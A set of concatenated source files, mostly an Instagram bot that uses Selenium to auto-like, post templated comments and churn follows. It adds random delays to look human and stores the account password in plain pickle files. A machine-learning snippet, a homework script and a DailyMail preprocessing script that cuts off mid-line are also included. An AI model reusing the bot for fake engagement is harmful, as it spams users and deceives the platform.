            g_aggregate_weight, g_feature_vect_each_weight, g_feature_vect_add_weight = self._gradient_one(graph, label)
            delta_aggregate += g_aggregate_weight / n
            delta_feature_vect_each += g_feature_vect_each_weight / n
            delta_feature_vect_add += g_feature_vect_add_weight / n
        # SGD is momentum-SGD with a zero velocity coefficient, so the two
        # branches of the original code collapse into one update rule.
        if self.optimizer == 'SGD':
            beta = 0.0
        elif self.optimizer == 'momentum':
            beta = self.momentum
        else:
            beta = None  # unknown optimizer: leave the parameters untouched
        if beta is not None:
            self.aggregate_weight_d = -self.learning_rate * delta_aggregate + beta * self.aggregate_weight_d
            self.feature_vect_each_weight_d = -self.learning_rate * delta_feature_vect_each + beta * self.feature_vect_each_weight_d
            self.feature_vect_add_weight_d = -self.learning_rate * delta_feature_vect_add + beta * self.feature_vect_add_weight_d
            # In-place ndarray updates keep learning_params[0:2] aliased.
            self.aggregate_weight += self.aggregate_weight_d
            self.feature_vect_each_weight += self.feature_vect_each_weight_d
            self.feature_vect_add_weight += self.feature_vect_add_weight_d
        self.learning_params = [self.aggregate_weight, self.feature_vect_each_weight, self.feature_vect_add_weight]
        self.learning_params_d = [self.aggregate_weight_d, self.feature_vect_each_weight_d, self.feature_vect_add_weight_d]

    def fit(self, graphs: np.ndarray, labels: list):
        """
        Fit the data with shuffled mini-batches for self.epoch epochs.
        IF YOU CALL THIS METHOD TWO OR MORE TIMES, YOU CAN FIT ADDITIONAL EPOCHS.

        parameters
        ----------
        graphs : np.ndarray
            Collection of graphs.
        labels : list
            The list of correct answer labels of the graphs.
        """
        num = graphs.shape[0]
        for _ in range(self.epoch):
            shuffle_idx = np.random.permutation(np.arange(num))
            shuffle_graphs = graphs[shuffle_idx]
            shuffle_labels = np.array(labels)[shuffle_idx].tolist()
            # NOTE: a trailing partial batch (num % batch_size) is skipped,
            # as in the original implementation.
            for i in range(num // self.batch_size):
                batch_graphs = shuffle_graphs[i*self.batch_size:(i+1)*self.batch_size]
                batch_labels = shuffle_labels[i*self.batch_size:(i+1)*self.batch_size]
                self._optimize(batch_graphs, batch_labels)

    def predict(self, graphs: np.ndarray) -> list:
        """
        Predict the labels of the given graphs.

        parameters
        ----------
        graphs : np.ndarray
            Collection of graphs.

        returns
        ----------
        labels : list
            List of the predicted (boolean) labels.
        """
        return [self._predict_one(graph) for graph in graphs]

    def predict_prob(self, graphs: np.ndarray, labels: list) -> float:
        """
        Accuracy of the prediction.

        parameters
        ----------
        graphs : np.ndarray
            Collection of graphs.
        labels : list
            The list of correct answer labels of the graphs.

        returns
        ----------
        prob : float
            Correct answer rate in [0, 1].
        """
        predict_labels = self.predict(graphs)
        n = len(labels)
        prob = sum([l == p for l, p in zip(labels, predict_labels)]) / n
        return prob
|
gmunozhe/astr-119-hw-1 | check_in_solution.py | #include the Numpy library
import numpy as np
#define the main() function
def main():
    """Start from 119.0; for each i in [0, 120) add 3 when i is even and
    subtract 5 when i is odd, then print the result in scientific notation
    with two decimal places."""
    x = 119.0
    for i in range(120):
        x += 3.0 if i % 2 == 0 else -5.0
    print("%3.2e" % x)


if __name__ == "__main__":  # run main() when executed as a script
    main()
|
PhilippMatthes/instabot | Mailer.py | <reponame>PhilippMatthes/instabot
import telepot
import telepot.api
import urllib3
import pickle
import matplotlib.pyplot as plt
telepot.api._pools = {
'default': urllib3.PoolManager(num_pools=3, maxsize=10, retries=10, timeout=240),
}
class Mailer:
    """Telegram notification helper built on telepot.

    The bot API key and the chat (user) id are cached as pickle files under
    log/ and requested interactively on first run.

    NOTE(review): the bare `except:` clauses below also swallow
    KeyboardInterrupt and corrupt-pickle errors; pickle.load is only safe
    on trusted local files.
    """
    def __init__(self):
        # Load (or interactively create) the Telegram bot API key.
        try:
            with open("log/telepot_api_key.pickle","rb") as f:
                self.key = pickle.load(f)
        except:
            key = input("Telepot api key was not discovered. Please enter your Key: ")
            while len(key) != 45:
                key = input("The key you entered is no valid Telegram API key. Please try again: ")
            with open("log/telepot_api_key.pickle","wb") as f:
                pickle.dump(key,f)
            self.key = key
        # Load (or interactively create) the target chat/user id.
        try:
            with open("log/telepot_user_number.pickle","rb") as f:
                self.telepot_user_number = pickle.load(f)
        except:
            telepot_user_number = input("User key was not discovered. Please enter your Key: ")
            while len(telepot_user_number) != 9:
                telepot_user_number = input("The key you entered is no valid user key. Please try again: ")
            with open("log/telepot_user_number.pickle","wb") as f:
                pickle.dump(telepot_user_number,f)
            self.telepot_user_number = telepot_user_number
    def send(self,text):
        """Send a plain-text Telegram message to the configured user."""
        self.bot = telepot.Bot(self.key)
        self.bot.sendMessage(self.telepot_user_number,text)
    def send_image(self,image,caption):
        """Send the image file at path `image` with the given caption."""
        self.bot = telepot.Bot(self.key)
        with open(image, 'rb') as f:
            self.bot.sendPhoto(self.telepot_user_number,f,caption)
    def send_stats(self,numbers,hashtags,caption):
        """Plot `numbers` against `hashtags` and send the chart as a photo."""
        if len(numbers) != len(hashtags):
            raise Exception("Number length doesnt equal hashtags length")
        fig = plt.figure()
        x = range(0,len(hashtags))
        y = numbers
        labels = hashtags
        plt.plot(x,y, 'r')
        plt.xticks(x, labels, rotation='vertical')
        plt.margins(0.2)
        image = "log/stats.png"
        fig.savefig(image)
        self.send_image(image,caption)
    def get_current_message(self):
        """Return the text of the most recent incoming message, or ''.

        Any API/network failure is deliberately reduced to '' so callers
        can poll without error handling.
        """
        try:
            self.bot = telepot.Bot(self.key)
            updates = self.bot.getUpdates()
            if len(updates) == 0:
                return ""
            else:
                message_offset = updates[len(updates)-1]["update_id"]
                current_message = self.bot.getUpdates(offset = message_offset)
                return current_message[0]["message"]["text"]
        except:
            return ""
|
PhilippMatthes/instabot | InstaDriver.py | <filename>InstaDriver.py
from selenium import webdriver # For webpage crawling
from time import sleep
import time
from selenium.webdriver.common.keys import Keys # For input processing
from random import randint
import sys # For file path processing
import datetime # For timestamp
import pickle # For data management
import os
from Mailer import Mailer
from Config import Config
if Config.headless_is_available:
from xvfbwrapper import Xvfb
# from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
# dcap = dict(DesiredCapabilities.PHANTOMJS)
# dcap["phantomjs.page.settings.userAgent"] = \
# ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36")
class Driver(object):
    def __init__(self):
        """Set up Telegram messaging, the (optional) virtual display, all
        persisted bot state, credentials, and the Selenium browser.

        Every piece of state is a pickle file under log/; on any load
        failure a fresh file with a default value is created.
        NOTE(review): the bare `except:` clauses also mask corrupt pickles
        and KeyboardInterrupt.
        """
        # Set up Telegram Message Client
        self.mailer = Mailer()
        # Set up virtual display (headless servers only)
        if Config.headless_is_available:
            self.display = Xvfb()
            self.display.start()
        # Load history: users we have interacted with.
        try:
            with open("log/interacting_users.pickle","rb") as f:
                self.interacting_users = pickle.load(f)
        except:
            with open("log/interacting_users.pickle","wb") as f:
                self.interacting_users = []
                pickle.dump([],f)
        # Hashtag weights; each configured topic starts at weight 2.
        try:
            with open("log/hashtags.pickle","rb") as f:
                self.hashtags = pickle.load(f)
        except:
            with open("log/hashtags.pickle","wb") as f:
                self.hashtags = {}
                for h in Config.topics:
                    self.hashtags[h] = 2
                pickle.dump(self.hashtags,f)
        # Per-author log of like/comment/follow actions.
        try:
            with open("log/actionList.pickle","rb") as f:
                self.actionList = pickle.load(f)
        except:
            with open("log/actionList.pickle","wb") as f:
                self.actionList = {}
                pickle.dump({},f)
        # All accounts ever followed (name -> timestamp).
        try:
            with open("log/followed_users_all_time.pickle","rb") as f:
                self.followed_accounts = pickle.load(f)
        except:
            with open("log/followed_users_all_time.pickle","wb") as f:
                self.followed_accounts = {}
                pickle.dump({},f)
        # Accounts still pending an unfollow.
        try:
            with open("log/followed_users.pickle","rb") as f:
                self.accounts_to_unfollow = pickle.load(f)
        except:
            with open("log/followed_users.pickle","wb") as f:
                self.accounts_to_unfollow = []
                pickle.dump([],f)
        # Instagram credentials, prompted for on first run.
        try:
            with open("log/instagram_username.pickle","rb") as f:
                self.username = pickle.load(f)
        except:
            key = input("Please enter your username: ")
            while len(key) == 0:
                key = input("You must enter a username. Please try again: ")
            with open("log/instagram_username.pickle","wb") as f:
                pickle.dump(key,f)
            self.username = key
        # NOTE(review): the password is stored as an unencrypted pickle.
        try:
            with open("log/instagram_pass.pickle","rb") as f:
                self.password = pickle.load(f)
        except:
            key = input("Please enter your password: ")
            while len(key) == 0:
                key = input("You must enter a password. Please try again: ")
            with open("log/instagram_pass.pickle","wb") as f:
                pickle.dump(key,f)
            self.password = key
        # Final setup: headless PhantomJS on servers, visible Chrome locally.
        if Config.headless_is_available:
            # self.browser = webdriver.PhantomJS(desired_capabilities=dcap)
            self.browser = webdriver.PhantomJS()
        else:
            self.browser = webdriver.Chrome("./chromedriver")
        self.browser.set_window_size(1980,1081)
# Returns nicely formatted timestamp
def timestamp(self):
return time.strftime('%a %H:%M:%S')+" "
    def focus(self,element):
        """Give keyboard focus to a DOM element via JavaScript."""
        self.browser.execute_script("arguments[0].focus();", element)
# Checks if a user was followed already
def user_followed_already(self, user):
if user in self.followed_accounts:
return True
else:
return False
# Logs into Instagram automatically
    def login(self):
        """Log into Instagram; honors Pause/Stop Telegram commands and
        retries recursively on any failure.

        NOTE(review): `<PASSWORD>` below is an upstream credential-scrubbing
        artifact and is not valid Python; it presumably should read
        `self.password` -- confirm before running.
        NOTE(review): the failure path recurses with no depth limit.
        """
        self.mailer.send("Logging in.")
        print("Logging in.")
        self.browser.get(Config.start_url)
        sleep(5)
        # Already logged in from a previous session.
        if (self.browser.current_url == "https://www.instagram.com/"):
            return
        # Remote control via Telegram.
        if (self.mailer.get_current_message() == "Pause"):
            self.mailer.send("Bot paused.")
            raise Exception("Bot paused.")
        if (self.mailer.get_current_message() == "Stop"):
            self.mailer.send("Bot stopped.")
            raise Exception("Bot stopped.")
        try:
            username_field = self.browser.find_element_by_name("username")
            username_field.send_keys(self.username)
            password_field = self.browser.find_element_by_name("password")
            password_field.send_keys(<PASSWORD>)
            password_field.send_keys(Keys.RETURN)
            sleep(10)
            return
        except KeyboardInterrupt:
            return
        except:
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Exception in self.login')
            sleep(1)
            self.login()
            return
# Comments on a picture
    def comment(self, topic):
        """Post a random templated comment on the current picture and log
        the action under the author's name in actionList."""
        sleep(3)
        # Random comment template + random smiley, formatted with the author.
        query = Config.comments[randint(0,len(Config.comments)-1)]
        say = query.format(self.author(),Config.smileys[randint(0,len(Config.smileys)-1)])
        try:
            comment_field = self.browser.find_element_by_xpath(Config.comment_xpath)
            comment_field.send_keys(say)
            comment_field.send_keys(Keys.RETURN)
            self.mailer.send("Commented on "+str(self.author())+"s picture with: "+say+"\n")
            print("Commented on "+str(self.author())+"s picture with: "+say)
            # Append the action to this author's history (create if new).
            if self.author() not in self.actionList.keys():
                value = {"type":"comment","time":self.timestamp(),"topic":topic}
                self.actionList[self.author()] = [value]
            else:
                value = {"type":"comment","time":self.timestamp(),"topic":topic}
                authorActions = self.actionList[self.author()]
                authorActions.append(value)
                self.actionList[self.author()] = authorActions
            with open("log/actionList.pickle", "wb") as userfile:
                pickle.dump(self.actionList, userfile)
            sleep(1)
        except KeyboardInterrupt:
            return
        except:
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Exception in self.comment')
            self.mailer.send("Comment field not found.\n")
            print("Comment field not found.")
# Searches for a certain topic
    def search(self, query):
        """Navigate the browser to the explore page for a hashtag."""
        self.mailer.send("Searching for "+query+".")
        print("Searching for "+query+".")
        self.browser.get("https://www.instagram.com/explore/tags/"+query+"/")
# Checks for error which occurs when pictures are removed while
# switching through
    def error(self):
        """Return True if the page shows the loading-error element (seen
        when a post is removed while paging through); False otherwise."""
        try:
            error_message = self.browser.find_element_by_xpath(Config.error_xpath)
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Page loading error')
            print("Page loading error.")
            return True
        except KeyboardInterrupt:
            return
        except:
            # Element absent -> no error on the page.
            return False
# Selects the first picture in a loaded topic screen
    def select_first(self):
        """Open a thumbnail from the currently loaded topic page.

        Prefers the 10th thumbnail (presumably to skip the "top posts"
        section -- TODO confirm), falling back to the last one available.
        Returns True on success, False on failure.
        """
        try:
            pictures = self.browser.find_elements_by_xpath(Config.first_ele_xpath)
            print("Found "+str(len(pictures))+" pictures.")
            first_picture = None
            if len(pictures) > 9:
                first_picture = pictures[9]
            else:
                first_picture = pictures[len(pictures)-1]
            self.focus(first_picture)
            first_picture.click()
            sleep(1)
            return True
        except KeyboardInterrupt:
            return
        except:
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Exception in self.select_first')
            sleep(5)
            return False
# Switches to the next picture
    def next_picture(self):
        """Advance to the next post; on failure navigate back and reopen
        the feed via select_first()."""
        try:
            sleep(1)
            next_button = self.browser.find_element_by_xpath(Config.next_button_xpath)
            next_button.click()
            return
        except KeyboardInterrupt:
            return
        except:
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Exception in self.next_picture')
            # Recover by going back one page and re-selecting a thumbnail.
            self.browser.execute_script("window.history.go(-1)")
            sleep(5)
            self.select_first()
            sleep(1)
# Loads the authors name
    def author(self):
        """Return the username of the current post's author, or '' when the
        author element cannot be located."""
        try:
            author = self.browser.find_element_by_xpath(Config.author_xpath)
            return str(author.get_attribute("title"))
        except KeyboardInterrupt:
            return
        except:
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Exception in self.author')
            self.mailer.send("Author xpath not found.\n")
            print("Author xpath not found.")
            return ""
# Checks if the post is already liked
    def already_liked(self):
        """True if the current post shows the filled ("already liked")
        heart element; False when the element is absent."""
        try:
            full = self.browser.find_element_by_xpath(Config.like_button_full_xpath)
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Image was already liked.')
            return True
        except:
            return False
    def on_post_page(self):
        """True when there is no 'next' button, i.e. we left the lightbox
        and landed on a standalone post page."""
        try:
            full = self.browser.find_element_by_xpath(Config.next_button_xpath)
            return False
        except:
            return True
# Likes a picture
    def like(self, topic):
        """Like the current post (skipping up to 10 already-liked ones),
        log the action, then sleep a randomised delay.

        On failure, restarts from the topic search page and retries
        recursively (NOTE(review): no recursion depth limit).
        """
        count = 0
        # Skip forward past posts we already liked (bounded to 10 hops).
        while self.already_liked() and count < 10:
            self.mailer.send("Post already liked. Skipping.\n")
            print("Post already liked. Skipping.")
            self.next_picture()
            if self.on_post_page():
                self.browser.save_screenshot('error.png')
                self.mailer.send_image('error.png','Accidently swapped to post page.')
                return
            count = count + 1
            sleep(1)
        try:
            self.mailer.send("Liked picture/video by: "+self.author()+".\n")
            print("Liked picture/video by: "+self.author()+".")
            # Record the like in the per-author action history.
            if self.author() not in self.actionList.keys():
                value = {"type":"like","time":self.timestamp(),"topic":topic}
                self.actionList[self.author()] = [value]
            else:
                value = {"type":"like","time":self.timestamp(),"topic":topic}
                authorActions = self.actionList[self.author()]
                authorActions.append(value)
                self.actionList[self.author()] = authorActions
            with open("log/actionList.pickle", "wb") as userfile:
                pickle.dump(self.actionList, userfile)
            like_button = self.browser.find_element_by_xpath(Config.like_button_xpath)
            like_button.click()
            # Randomised delay to mimic human pacing.
            sneaksleep = randint(0,10) + Config.delay
            sleep(sneaksleep)
            return
        except KeyboardInterrupt:
            return
        except:
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Exception in self.like')
            sleep(Config.delay)
            # Recover: reload the topic feed and retry from the top.
            self.search(topic)
            self.select_first()
            self.like(topic)
            return
# Unfollows a user
    def unfollow(self, name):
        """Open the profile of *name* and click its unfollow button."""
        self.browser.get("https://www.instagram.com/"+name+"/")
        sleep(3)
        try:
            unfollow_button = self.browser.find_element_by_xpath(Config.unfollow_xpath)
            unfollow_button.click()
            self.mailer.send("Unfollowed: "+name+".\n")
            print("Unfollowed: "+name)
            sleep(2)
        except KeyboardInterrupt:
            return
        except:
            self.browser.save_screenshot('error.png')
            self.mailer.send_image('error.png','Exception in self.unfollow')
            self.mailer.send("Unfollow button not found.\n")
            print("Unfollow button not found.")
            sleep(1)
# Follows a user
def follow(self, topic):
    """Follow the author of the currently open picture and log the action.

    Persists the action log, the unfollow queue and the all-time followed
    map to pickle files under log/.

    Args:
        topic: Hashtag under which this author was found; stored with the
            logged action in ``self.actionList``.
    """
    sleep(3)
    try:
        follow = self.browser.find_element_by_xpath(Config.follow_xpath)
        follow.click()
        # Hoisted: each self.author() call queries the DOM; read it once so
        # all bookkeeping below refers to the same user.
        author = self.author()
        self.mailer.send("Followed: "+author+"\n")
        print("Followed: "+author)
        # Record the action in the per-author history, then persist it.
        value = {"type":"follow","time":self.timestamp(),"topic":topic}
        if author not in self.actionList.keys():
            self.actionList[author] = [value]
        else:
            authorActions = self.actionList[author]
            authorActions.append(value)
            self.actionList[author] = authorActions
        with open("log/actionList.pickle", "wb") as userfile:
            pickle.dump(self.actionList, userfile)
        self.accounts_to_unfollow.append(author)
        # Fix: dump the unfollow queue AFTER appending the new author.
        # The original wrote the pickle before the append, so a crash would
        # lose the most recent follow from the persisted queue.
        with open("log/followed_users.pickle", "wb") as userfile:
            pickle.dump(self.accounts_to_unfollow, userfile)
        self.followed_accounts.update({author:self.timestamp()})
        with open("log/followed_users_all_time.pickle", "wb") as userfile:
            pickle.dump(self.followed_accounts, userfile)
        sleep(Config.delay + randint(0,10))
    except KeyboardInterrupt:
        # Consistent with like()/unfollow(): let the user abort cleanly
        # instead of treating Ctrl-C as a "button not found" error.
        return
    except Exception:
        self.browser.save_screenshot('error.png')
        self.mailer.send_image('error.png','Exception in self.follow')
        self.mailer.send("Follow button not found.\n")
        print("Follow button not found.")
        sleep(1)
def open_unfollow_screen(self):
    """Navigate to the bot account's own profile and open the list of
    accounts it is following."""
    self.browser.get(Config.account_url)
    sleep(2)
    # Click the "following" element straight away; no need to keep a
    # reference to it.
    self.browser.find_element_by_xpath(Config.following_xpath).click()
    sleep(2)
def check_follows(self):
    """Scan the currently open activity list for users who interacted
    with us, mail a summary of our logged actions for each newly seen
    user, and persist the updated ``interacting_users`` list.

    Also bumps the score of every hashtag that led to an interaction.
    """
    try:
        sections = self.browser.find_elements_by_xpath(Config.sections_xpath)
        print(str(len(sections))+" Sections found.")
    except:
        # Page layout changed or not loaded; nothing to scan this round.
        print("Sections not found.")
        return
    # Collect the usernames shown in each section.
    users = []
    for element in sections:
        profile = element.find_element_by_xpath(Config.local_name_xpath)
        name = profile.get_attribute("title")
        users.append(name)
    for user in users:
        if user not in self.interacting_users:
            if user not in self.actionList.keys():
                self.mailer.send("New interaction discovered with: "+user+", but we have no further information.")
                sleep(1)
            else:
                actions = self.actionList[user]
                self.mailer.send("New interaction discovered with: "+user+", and we have logged our interactions on him:")
                sleep(1)
                string = ""
                for action in actions:
                    string += "Type: "+action["type"]+", Time: "+action["time"]+", Topic: "+action["topic"]+" ... "
                    # Reward the hashtag that produced this interaction.
                    # NOTE(review): raises KeyError if the topic is no
                    # longer a key of self.hashtags — confirm topics are
                    # never pruned from that dict.
                    self.hashtags[action["topic"]] += 1
                self.mailer.send(string)
                sleep(1)
            self.interacting_users.append(user)
    with open("log/interacting_users.pickle", "wb") as userfile:
        pickle.dump(self.interacting_users, userfile)
    return
def store_hashtags(self):
    """Harvest hashtags from the currently visible post and persist their
    popularity scores.

    Every occurrence of a hashtag adds 0.01 to its score in
    ``self.hashtags``; the whole mapping is re-pickled afterwards.
    Failures are reported by screenshot/mail and otherwise ignored
    (best-effort logging must not stop the main loop).
    """
    try:
        sections = self.browser.find_elements_by_xpath(Config.hashtags_xpath)
        for section in sections:
            all_hashtags = self.extract_hash_tags(section.text)
            for h in all_hashtags:
                # dict.get seeds unseen tags with 0, replacing the
                # hand-rolled membership test of the original.
                self.hashtags[h] = self.hashtags.get(h, 0) + 0.01
        with open("log/hashtags.pickle","wb") as f:
            pickle.dump(self.hashtags,f)
    except Exception:
        # Narrowed from a bare except so KeyboardInterrupt still aborts;
        # the trailing redundant `pass` was removed.
        self.browser.save_screenshot('error.png')
        self.mailer.send_image('error.png','Exception in self.store_hashtags')
def extract_hash_tags(self, s):
    """Return the set of hashtag bodies (without the leading '#') in *s*.

    Args:
        s: Arbitrary text, e.g. a post caption.

    Returns:
        set[str]: Deduplicated hashtag names.
    """
    tags = set()
    for word in s.split():
        if word.startswith('#'):
            tags.add(word[1:])
    return tags
# Coordinates every function in an endless loop
def like_follow_loop(self):
    """Main bot loop: log in, then endlessly rotate through the top
    hashtags, commenting on, liking and following posts, and unfollowing
    queued accounts once more than 50 are pending.

    Raises:
        Exception: when the mailer delivers an Exit/Pause/Stop command —
            used to break out of the nested loops; caught by the caller.
    """
    self.login()
    while True:
        # Refresh our view of who interacts with us.
        self.open_unfollow_screen()
        self.check_follows()
        # Mail the 20 best- and 20 worst-scoring hashtags as statistics.
        top_hashtags = sorted(self.hashtags.keys(), key=lambda k: self.hashtags[k], reverse=True)[:20]
        top_hashtags_values = []
        for hashtag in top_hashtags:
            top_hashtags_values.append(self.hashtags[hashtag])
        self.mailer.send_stats(top_hashtags_values,top_hashtags,caption="Top 20 hashtags")
        low_hashtags = sorted(self.hashtags.keys(), key=lambda k: self.hashtags[k], reverse=True)[-20:]
        low_hashtags_values = []
        for hashtag in low_hashtags:
            low_hashtags_values.append(self.hashtags[hashtag])
        self.mailer.send_stats(low_hashtags_values,low_hashtags,caption="Low 20 hashtags")
        sleep(1)
        # NOTE(review): range(len(...)-1) skips the last of the top
        # hashtags every round — confirm whether that is intentional.
        for topic_selector in range(len(top_hashtags)-1):
            if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
                raise Exception('Breaking out of inner loop')
            self.search(top_hashtags[topic_selector])
            print("Selecting first picture.")
            self.select_first()
            # Comment only on every 7th topic (offset 2) to stay subtle.
            if (topic_selector % 7 == 2):
                if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
                    raise Exception('Breaking out of inner loop')
                if not self.error():
                    self.comment(top_hashtags[topic_selector])
                    self.store_hashtags()
                    self.next_picture()
            # Like up to three pictures for this topic.
            for likes in range(3):
                sleep(1)
                if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
                    raise Exception('Breaking out of inner loop')
                if not self.error():
                    self.like(top_hashtags[topic_selector])
                    self.store_hashtags()
                    self.next_picture()
            # Follow up to three authors, skipping already-followed ones
            # (at most 10 skips in a row).
            for follows in range(3):
                sleep(1)
                if not self.error():
                    if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
                        raise Exception('Breaking out of inner loop')
                    self.next_picture()
                    count = 0
                    sleep(3)
                    while self.user_followed_already(self.author()) and count < 10:
                        if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
                            raise Exception('Breaking out of inner loop')
                        self.mailer.send(self.author()+" was followed already. Skipping picture.")
                        print(self.author()+" was followed already. Skipping picture.")
                        self.next_picture()
                        count = count + 1
                        sleep(1)
                    self.follow(top_hashtags[topic_selector])
                    self.store_hashtags()
            self.mailer.send("Accounts to unfollow: " + str(len(self.accounts_to_unfollow)))
            print("Accounts to unfollow: " + str(len(self.accounts_to_unfollow)))
            # Drain the unfollow queue three at a time once it exceeds 50.
            if len(self.accounts_to_unfollow) > 50:
                for unfollows in range(3):
                    if (self.mailer.get_current_message() == "Exit" or self.mailer.get_current_message() == "Pause" or self.mailer.get_current_message() == "Stop"):
                        raise Exception('Breaking out of inner loop')
                    this_guy = self.accounts_to_unfollow[0]
                    self.unfollow(this_guy)
                    del self.accounts_to_unfollow[0]
|
PhilippMatthes/instabot | Config.py | class Config:
# Seed hashtags the bot starts its topic rotation with.
topics = [ "graphics",
            "render",
            "cartoon",
            "daily",
            "art",
            "design",
            "cinema4d",
            "animation",
            "cg",
            "illustration",
            "3d",
            "corona",
            "octane",
            "rendering",
            "sculpting"]
# Base delay (seconds) between bot actions; random jitter is added on top.
delay = 35
start_url = "https://www.instagram.com/accounts/login/"
following_link = "https://www.instagram.com/snrmtths/following/"
account_url = "https://www.instagram.com/snrmtths/"
# Whether the browser may run without a visible window.
headless_is_available = True
# The following (xpath) classes need to be refreshed every now and then.
# they define, where elements are located on Instagram.
# NOTE(review): these obfuscated class names break whenever Instagram
# redeploys its frontend — expect them to be stale.
sections_xpath = "//*[contains(@class, '_75ljm _3qhgf')]"
local_name_xpath = ".//a[@class='_2g7d5 notranslate _nodr2']"
local_follow_xpath = "//a[@class='_ov9ai']"
hashtags_xpath = "//*[contains(@class, '_ezgzd')]"
# local_button_xpath = ".//*[@class='_ah57t _6y2ah _i46jh _rmr7s']"
first_ele_xpath = "//*[contains(@class, '_si7dy')]"
following_xpath = "//*[contains(@class, '_ohbcb _gvoze coreSpriteDesktopNavActivity')]"
follow_xpath = "//*[contains(@class, '_qv64e _iokts _4tgw8 _njrw0')]"
unfollow_xpath = "//*[contains(@class, '_qv64e _t78yp _r9b8f _njrw0')]"
comment_xpath = "//*[contains(@class, '_bilrf')]"
error_xpath = "//*[contains(@class, 'error-container -cx-PRIVATE-ErrorPage__errorContainer')]"
author_xpath = "//*[contains(@class, '_2g7d5 notranslate _iadoq')]"
next_button_xpath = "//*[contains(@class, '_3a693 coreSpriteRightPaginationArrow')]"
like_button_xpath = "//*[contains(@class, '_8scx2 coreSpriteHeartOpen')]"
like_button_full_xpath = "//*[contains(@class, '_8scx2 coreSpriteHeartFull')]"
# Available comments: the first {} is replaced with the username
# the second is replaced with a smiley. Note that UTF-8 smileys are only
# supported by Firefox driver which may corrupt some timed functionalities.
comments = [ "Nice @{} {}","@{} cool {} ","Great style @{} {}","Amazing @{} {}",\
    "Awesome @{} {}","Fantastic @{} {}","@{} {}","Brilliant one @{} {}",\
    "Pretty nice @{} {}","Awesome feed @{} {}","I like your feed @{} {}",\
    "Top @{} {}", "Really cool works @{}! {}", "@{} Rad!!! {}",\
    "This is cool @{} {}", "Love this @{} {}", "Great @{}! {}", "Yeah @{} {}"]
smileys = [ ":)",":D","=D","=)",";)",":)",":)",";D" ]
|
PhilippMatthes/instabot | Main.py | from InstaDriver import Driver
from Mailer import Mailer
from time import sleep
import traceback
import sys
import os
import errno
from socket import error as socket_error
def loop():
    """Wait for a Start/Continue command from the mailer, then run the
    bot's like/follow loop until interrupted or told to stop.

    Raises:
        Exception: when a Stop/Exit command is received (propagates to run()).
        socket.error: re-raised so run() can decide whether to restart.
    """
    session = Driver()
    mailer = Mailer()
    while True:
        message = mailer.get_current_message()
        if (message == "Start" or message == "Continue"):
            try:
                session.like_follow_loop()
            except KeyboardInterrupt:
                mailer.send("Keyboard Interrupt. Bot will exit now.")
                print("Exiting...")
                break
            except socket_error as err:
                # Let run() handle connection problems (it may rebuild
                # the driver and mailer).
                raise err
            except Exception as err:
                # Report each traceback frame of the failure, then keep
                # looping — the bot is meant to survive transient errors.
                for frame in traceback.extract_tb(sys.exc_info()[2]):
                    fname, lineno, fn, text = frame
                    error = "Error in "+str(fname)+" on line "+str(lineno)+": "+str(err)
                    print(error)
                    mailer.send(error)
                pass
        else:
            if (message == "Stop" or message == "Exit"):
                mailer.send("Instagram Bot will exit now.")
                raise Exception
        sleep(1)
def run():
    """Top-level supervisor: repeatedly announce readiness and run loop(),
    rebuilding the driver and mailer whenever the mail connection is
    refused. Any other socket error is fatal.
    """
    session = Driver()
    mailer = Mailer()
    while True:
        try:
            mailer.send("Instagram Bot started. Please send >>Start<< to start")
            loop()
        except socket_error as err:
            if err.errno != errno.ECONNREFUSED:
                raise err
            else:
                # Connection refused: recreate the session and mailer and
                # retry on the next iteration.
                session = Driver()
                mailer = Mailer()
if __name__=="__main__":
    # Ensure the pickle/log directory exists before anything writes to it.
    os.makedirs("./log", exist_ok=True)
    run()
|
rezakrimi/MaxoutTextSummarization | cnn-dailymail/process.py | import os
import nltk
from tqdm import tqdm
import json
from collections import defaultdict
import pickle
def word_tokenize(tokens):
    """Tokenize *tokens* with NLTK, normalizing LaTeX-style double quotes
    (`` and '') back to a plain '"' character in every token."""
    normalized = []
    for raw in nltk.word_tokenize(tokens):
        normalized.append(raw.replace("''", '"').replace("``", '"'))
    return normalized
# Parse every DailyMail .story file into an example of (article tokens,
# highlight string), build a token-frequency counter, and pickle both.
directory = './dailymail/stories/'
examples = list()
counter = defaultdict(int)
for filename in tqdm(os.listdir(directory)):
    if filename.endswith('.story'):
        # NOTE(review): the handle is never closed (file.close() is
        # commented out below) — consider a `with open(...)` block.
        file = open(os.path.join(directory, filename), 'r')
        is_highlight = False
        content_finished = False
        content = ''
        highlights = []
        for line in file:
            line = line.strip()
            # Everything before the first @highlight marker is article body.
            if not content_finished and line:
                content = content + ' ' + line
            # The non-empty line after an @highlight marker is one summary
            # sentence.
            if is_highlight and line:
                highlights.append(line)
                is_highlight = False
            if line.startswith('@highlight'):
                is_highlight = True
                content_finished = True
        # content[1:] drops the leading space added by the first append.
        content = word_tokenize(content[1:].replace("''", '" ').replace("``", '" ').lower())
        # Join highlights with '##' separators; terminate the last with '.'.
        highlight = ''
        for i, h in enumerate(highlights):
            if highlight != '':
                highlight += '\n'
            if i < len(highlights)-1:
                highlight += h + '##'
            if i == len(highlights)-1:
                highlight += h + '.'
        example = {
            'context_tokens': content,
            'ques_tokens': word_tokenize(highlight.replace("''", '" ').replace("``", '" ').lower())
        }
        # Weight article tokens by the number of highlights they support.
        for token in content:
            counter[token] += len(highlights)
        # NOTE(review): `highlight` is a str, so this iterates single
